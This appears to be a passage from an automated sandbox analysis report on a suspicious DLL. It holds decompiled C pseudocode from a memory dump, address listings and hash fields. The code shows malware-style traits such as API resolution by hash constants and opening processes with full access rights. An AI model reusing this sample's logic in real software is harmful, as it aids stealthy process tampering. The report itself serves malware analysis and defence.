								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6E2DF4E0( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6E2DF4F0( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6E2DF4F0( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6E2DF4E0( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6E2DF4E0( *((intOrPtr*)(_t439 + 4)), _t420);
										E6E2E38C8( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E2DF4F0( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6E2DF84C( *((intOrPtr*)(_t439 + 4)), E6E2DF4F0( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6E2E303C(0xfe338407, 0x77fa1d17);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6E2DF4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6E2DF4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6E2DF4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6E2DF4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6E2DF4E0( *((intOrPtr*)(_t439 + 8)), _t422);
										E6E2E38C8( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E2DF4F0( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6E2DF84C( *((intOrPtr*)(_t439 + 8)), E6E2DF4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E2DF4E0(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6e2da536
0x6e2da538
0x6e2da543
0x6e2da549
0x6e2da54d
0x6e2da552
0x6e2da558
0x6e2da568
0x00000000
0x6e2da56a
0x6e2da56a
0x6e2da575
0x6e2da575
0x6e2daaf3
0x6e2daaf5
0x6e2daaf6
0x6e2dab35
0x6e2dab39
0x6e2dab47
0x6e2dab55
0x6e2dab55
0x6e2dab40
0x6e2dab5b
0x6e2dab60
0x00000000
0x6e2dab60
0x6e2dab44
0x6e2dab45
0x00000000
0x6e2da57f
0x6e2da57f
0x6e2da583
0x6e2da68a
0x6e2da68a
0x6e2da68f
0x6e2da7a0
0x6e2da7a4
0x6e2da7a9
0x6e2da7ad
0x6e2da8d7
0x6e2da8d9
0x6e2da8dd
0x6e2da8e6
0x6e2da8ef
0x6e2da8f3
0x6e2da8fc
0x6e2da903
0x6e2da904
0x6e2da908
0x6e2da90c
0x6e2da910
0x6e2da912
0x6e2daa7c
0x6e2daa7c
0x6e2daa84
0x6e2daa9c
0x6e2daa9e
0x6e2daaa0
0x6e2daada
0x6e2daada
0x6e2daadc
0x6e2daadc
0x6e2daadf
0x6e2daafa
0x6e2dab0e
0x6e2dab11
0x6e2dab16
0x6e2dab21
0x6e2dab22
0x6e2dab25
0x6e2dab27
0x6e2dab30
0x00000000
0x6e2dab30
0x6e2daae1
0x6e2daae5
0x6e2daaee
0x00000000
0x6e2daaee
0x6e2daab1
0x6e2daac1
0x6e2daac5
0x6e2daac5
0x6e2daac8
0x6e2daacb
0x6e2daace
0x6e2daad4
0x00000000
0x00000000
0x00000000
0x6e2daad6
0x6e2da91a
0x6e2da91a
0x6e2da91c
0x6e2da920
0x6e2da925
0x6e2da927
0x6e2da92b
0x6e2da92e
0x6e2da936
0x6e2da938
0x00000000
0x00000000
0x6e2da94f
0x6e2da96a
0x6e2da96c
0x6e2da97f
0x6e2da981
0x6e2da983
0x6e2da99e
0x6e2da99e
0x6e2da9a2
0x6e2da9a4
0x00000000
0x00000000
0x6e2da9a6
0x6e2da9a9
0x6e2da9ca
0x6e2da9e9
0x6e2da9ef
0x6e2da9f2
0x6e2da9f7
0x6e2da9f8
0x6e2da9fc
0x00000000
0x00000000
0x6e2daa04
0x6e2daa04
0x6e2daa06
0x6e2daa12
0x6e2daa1e
0x6e2daa28
0x6e2daa2b
0x6e2daa2e
0x6e2daa32
0x6e2daa39
0x6e2daa3d
0x6e2daa41
0x6e2daa42
0x6e2daa46
0x6e2daa4b
0x6e2daa50
0x6e2daa54
0x6e2daa58
0x6e2daa5e
0x6e2daa64
0x6e2daa6a
0x6e2daa70
0x6e2daa75
0x6e2daa76
0x6e2daa76
0x00000000
0x6e2daa06
0x00000000
0x6e2da9a9
0x6e2da987
0x6e2da998
0x6e2da99a
0x6e2da99c
0x00000000
0x00000000
0x00000000
0x6e2da99c
0x6e2da9af
0x00000000
0x6e2da9af
0x6e2da7b3
0x6e2da7b6
0x6e2da7b8
0x00000000
0x00000000
0x6e2da7c0
0x6e2da7c0
0x6e2da7c2
0x6e2da7c2
0x6e2da7d3
0x6e2da7d5
0x6e2da7d8
0x00000000
0x00000000
0x6e2da8ce
0x6e2da8cf
0x6e2da8d1
0x00000000
0x00000000
0x00000000
0x6e2da8d1
0x6e2da7de
0x6e2da7e1
0x6e2da7eb
0x6e2da7f0
0x6e2da7f2
0x6e2da7f8
0x6e2da7ff
0x6e2da803
0x6e2da808
0x6e2da80c
0x6e2dac47
0x6e2dac5b
0x6e2dac7e
0x6e2dac83
0x6e2dac83
0x6e2da823
0x6e2da828
0x6e2da828
0x6e2da828
0x6e2da828
0x6e2da82e
0x6e2da833
0x6e2da835
0x6e2da83a
0x6e2da841
0x6e2da846
0x6e2da848
0x6e2dac05
0x6e2dac16
0x6e2dac30
0x6e2dac35
0x6e2dac35
0x6e2da85e
0x6e2da863
0x6e2da863
0x6e2da863
0x6e2da863
0x6e2da877
0x6e2da895
0x6e2da89a
0x6e2da8aa
0x6e2da8c7
0x6e2da8c9
0x6e2da8c9
0x00000000
0x6e2da7e1
0x6e2da697
0x6e2da697
0x6e2da699
0x6e2da6a0
0x6e2da6ae
0x6e2da6b0
0x6e2da6b3
0x6e2da6ba
0x6e2da6bc
0x6e2da6ed
0x6e2da6fc
0x6e2da6fe
0x6e2da700
0x6e2da71e
0x6e2da720
0x6e2da722
0x6e2da735
0x6e2da754
0x6e2da75a
0x6e2da75d
0x6e2da774
0x6e2da790
0x6e2da792
0x6e2da792
0x6e2da792
0x6e2da792
0x6e2da722
0x00000000
0x6e2da700
0x6e2da6c0
0x6e2da6c0
0x6e2da6c2
0x6e2da6d3
0x6e2da6d5
0x6e2da6d7
0x00000000
0x00000000
0x6e2da6e3
0x6e2da6e4
0x6e2da6eb
0x00000000
0x00000000
0x00000000
0x6e2da6eb
0x6e2da6d9
0x6e2da6dc
0x00000000
0x00000000
0x6e2da795
0x6e2da795
0x6e2da796
0x6e2da796
0x00000000
0x6e2da589
0x6e2da58b
0x6e2da58b
0x6e2da58d
0x6e2da594
0x6e2da5a2
0x6e2da5a4
0x6e2da5a8
0x6e2da5ac
0x6e2da5ae
0x6e2da5dc
0x6e2da5df
0x6e2da5e4
0x6e2da5e8
0x6e2da5ed
0x6e2da5f4
0x6e2da5f9
0x6e2da5fb
0x6e2dabc2
0x6e2dabd3
0x6e2dabf3
0x6e2dabf8
0x6e2dabf8
0x6e2da611
0x6e2da616
0x6e2da616
0x6e2da616
0x6e2da616
0x6e2da628
0x6e2da62a
0x6e2da62c
0x6e2da63d
0x6e2da63d
0x6e2da643
0x6e2da648
0x6e2da64c
0x6e2da652
0x6e2da659
0x6e2da65e
0x6e2da660
0x6e2dab76
0x6e2dab87
0x6e2daba8
0x6e2dabad
0x6e2dabad
0x6e2da677
0x6e2da67c
0x6e2da67c
0x6e2da67c
0x6e2da67c
0x6e2da67f
0x6e2da67f
0x00000000
0x6e2da67f
0x6e2da5b2
0x6e2da5b2
0x6e2da5b4
0x6e2da5c5
0x6e2da5c7
0x6e2da5c9
0x00000000
0x00000000
0x6e2da5d5
0x6e2da5d6
0x6e2da5da
0x00000000
0x00000000
0x00000000
0x6e2da5da
0x6e2da5cb
0x6e2da5ce
0x00000000
0x00000000
0x6e2da680
0x6e2da680
0x6e2da681
0x6e2da681
0x00000000
0x6e2da58d
0x6e2da583

Strings

, xrefs: 6E2DAB3B

Memory Dump Source

Source File: 00000003.00000002.428086465.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true

Associated: 00000003.00000002.428073469.000000006E2D0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428112325.000000006E2EA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.428123241.000000006E2ED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.428131857.000000006E2EF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a97082e8807b15e9a15049c56004c620803580660c6c35e8473fad275a02517e
Instruction ID: 92d2226e3ba514287ba3bee4ba61843868c57ed8a2ce2686f04acf45bd0bdd28
Opcode Fuzzy Hash: a97082e8807b15e9a15049c56004c620803580660c6c35e8473fad275a02517e
Instruction Fuzzy Hash: 2612A6755082099FD725DFA4C840AAF77EBAFC1708F254A1DE699972A0EF309C09CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6E2D846C, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E2D846C(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6E2DB69C(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6E2DF4F4(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6E2DF678(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6E2E223C(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6E2DF678(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6E2DF5A8(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6E2DF5A8(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6E2DF4E0(_t449 + 0x14, 0);
									_t180 = E6E2E2928( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6E2DB608(_t449 + 0x34);
										E6E2DB608(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E2DF4E0( *(_t449 + 4), _t315 << 2)));
										_t188 = E6E2DF4E0( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6E2DB608(_t449 + 0x34);
										E6E2DB608(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6E2DCAD0(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6E2DC2C4(_t343);
									if(__eflags != 0) {
										break;
									}
									E6E2DF84C(_t449 + 0x14, E6E2DF4F0(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6E2DF4E0(_t449 + 0x14, E6E2DF4F0(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6E2E303C(0xfe338407, 0xa8c8a645);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6E2DF84C(_t449 + 0x40, E6E2DF4F0(_t449 + 0x3c) + 4);
											 *(E6E2DF4E0(_t449 + 0x40, E6E2DF4F0(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6E2DCD68(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6E2DF4E0( *(_t449 + 4), _t431 * 4);
												_t212 = E6E2DF4E0(_t449 + 0x40, _t431 * 4);
												E6E2D8B9C( *_t211, E6E2E02D4(0xfe338407, 0x1a9c1df5),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6E2DCD68(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6E2DF4E0(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6E2DF4F0( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6E2DF4F0( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6E2DF4E0( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6E2DF4E0( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6E2E38C8( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E2DF4F0( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6E2DF84C( *(_t449 + 4), E6E2DF4F0( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6E2DF4F0(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6E2DF4F0(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6E2DF4E0(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6E2DF4E0(_t322, _t430);
										E6E2E38C8(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E2DF4F0(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6E2DF84C(_t322, E6E2DF4F0(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6E2DF84C( *(_t449 + 4), E6E2DF4F0( *_t449) + 4);
								 *(E6E2DF4E0( *(_t449 + 4), E6E2DF4F0( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6E2DF84C(_t322, E6E2DF4F0(_t322) + 4);
								 *(E6E2DF4E0(_t322, E6E2DF4F0(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6E2DF4E0(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6E2E303C(0x10154545, 0xc2a75cb8);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E2DF4E0(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6E2DF84C( *(_t449 + 4), E6E2DF4F0( *_t449) + 4);
										 *(E6E2DF4E0( *(_t449 + 4), E6E2DF4F0( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6E2DF4E0(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6E2DF84C( *((intOrPtr*)(_t449 + 0x74)), E6E2DF4F0( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6E2DF4E0( *((intOrPtr*)(_t449 + 0x74)), E6E2DF4F0( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6E2DF4E0( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6E2DF4E0( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6E2DF4F0( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6E2DF4F0(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6E2DF4E0(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6E2DF4E0(_t430, _t443);
										E6E2E38C8( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E2DF4F0(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6E2DF84C(_t430, E6E2DF4F0(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6E2E303C(0xfe338407, 0x77fa1d17);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6E2DF4E0( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6E2DF4F0( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6E2DF4F0( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6E2DF4E0( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6E2DF4E0( *(_t449 + 4), _t445);
										E6E2E38C8(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E2DF4F0( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6E2DF84C( *(_t449 + 4), E6E2DF4F0( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6E2DF4E0(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6e2d8479
0x6e2d847f
0x6e2d8483
0x6e2d8487
0x6e2d8492
0x6e2d8496
0x6e2d849b
0x6e2d84a3
0x6e2d84b3
0x00000000
0x6e2d84b5
0x6e2d84bd
0x6e2d84c4
0x6e2d84c4
0x6e2d8a17
0x6e2d8a19
0x6e2d8a5a
0x6e2d8a5c
0x6e2d8a6b
0x6e2d8a77
0x6e2d8a77
0x6e2d8a66
0x6e2d8a7d
0x6e2d8a82
0x00000000
0x6e2d8a82
0x6e2d8a6a
0x00000000
0x6e2d84ce
0x6e2d84d2
0x6e2d84d5
0x6e2d85dd
0x6e2d85dd
0x6e2d85e2
0x6e2d8705
0x6e2d8709
0x6e2d870e
0x6e2d8712
0x6e2d8716
0x6e2d884c
0x6e2d884e
0x6e2d8852
0x6e2d885b
0x6e2d8866
0x6e2d886a
0x6e2d8873
0x6e2d8878
0x6e2d887e
0x6e2d887f
0x6e2d8883
0x6e2d8887
0x6e2d888e
0x6e2d8890
0x6e2d89d0
0x6e2d89e1
0x6e2d89e8
0x6e2d89ef
0x6e2d89ef
0x6e2d89f2
0x6e2d89f5
0x6e2d89f8
0x6e2d89fe
0x6e2d8a05
0x6e2d8a09
0x6e2d8a12
0x00000000
0x6e2d8a12
0x6e2d8a00
0x6e2d8a03
0x6e2d8a1c
0x6e2d8a34
0x6e2d8a37
0x6e2d8a3c
0x6e2d8a46
0x6e2d8a49
0x6e2d8a4c
0x6e2d8a55
0x00000000
0x6e2d8a55
0x00000000
0x6e2d8a03
0x6e2d8898
0x6e2d8898
0x6e2d889a
0x6e2d889e
0x6e2d88a3
0x6e2d88a5
0x6e2d88a9
0x6e2d88ac
0x6e2d88b4
0x6e2d88b6
0x00000000
0x00000000
0x6e2d88cd
0x6e2d88e8
0x6e2d88ea
0x6e2d88f8
0x6e2d88fd
0x6e2d88ff
0x6e2d891c
0x6e2d891c
0x6e2d8920
0x6e2d8922
0x00000000
0x00000000
0x6e2d8924
0x6e2d8927
0x6e2d8948
0x6e2d8967
0x6e2d896d
0x6e2d8970
0x6e2d8975
0x6e2d8976
0x6e2d897d
0x00000000
0x00000000
0x6e2d8985
0x6e2d8985
0x6e2d8987
0x6e2d8993
0x6e2d899f
0x6e2d89c1
0x6e2d89c6
0x6e2d89c7
0x6e2d89c7
0x00000000
0x6e2d8987
0x00000000
0x6e2d8927
0x6e2d8901
0x6e2d8907
0x6e2d8909
0x6e2d890a
0x6e2d890b
0x6e2d890c
0x6e2d8910
0x6e2d8914
0x6e2d8916
0x6e2d8917
0x6e2d8918
0x6e2d891a
0x00000000
0x00000000
0x00000000
0x6e2d891a
0x6e2d892d
0x00000000
0x6e2d892d
0x6e2d871c
0x6e2d871e
0x6e2d8720
0x00000000
0x00000000
0x6e2d872a
0x6e2d872a
0x6e2d872c
0x6e2d872f
0x6e2d8731
0x6e2d8739
0x6e2d8740
0x6e2d8744
0x6e2d8747
0x00000000
0x00000000
0x6e2d8843
0x6e2d8844
0x6e2d8846
0x00000000
0x00000000
0x00000000
0x6e2d8846
0x6e2d874d
0x6e2d8750
0x6e2d8759
0x6e2d875e
0x6e2d8760
0x6e2d876c
0x6e2d8770
0x6e2d8775
0x6e2d8779
0x6e2d8b56
0x6e2d8b6a
0x6e2d8b8c
0x6e2d8b91
0x6e2d8b91
0x6e2d878f
0x6e2d8794
0x6e2d8798
0x6e2d8798
0x6e2d8798
0x6e2d8798
0x6e2d879d
0x6e2d87a2
0x6e2d87a4
0x6e2d87a8
0x6e2d87af
0x6e2d87b4
0x6e2d87b6
0x6e2d8b17
0x6e2d8b26
0x6e2d8b3f
0x6e2d8b44
0x6e2d8b44
0x6e2d87c9
0x6e2d87ce
0x6e2d87d2
0x6e2d87d2
0x6e2d87d2
0x6e2d87e4
0x6e2d8805
0x6e2d880d
0x6e2d881b
0x6e2d8839
0x6e2d883f
0x6e2d883f
0x00000000
0x6e2d8750
0x6e2d85e8
0x6e2d85e8
0x6e2d85ea
0x6e2d85f1
0x6e2d85ff
0x6e2d8601
0x6e2d8605
0x6e2d8607
0x6e2d8609
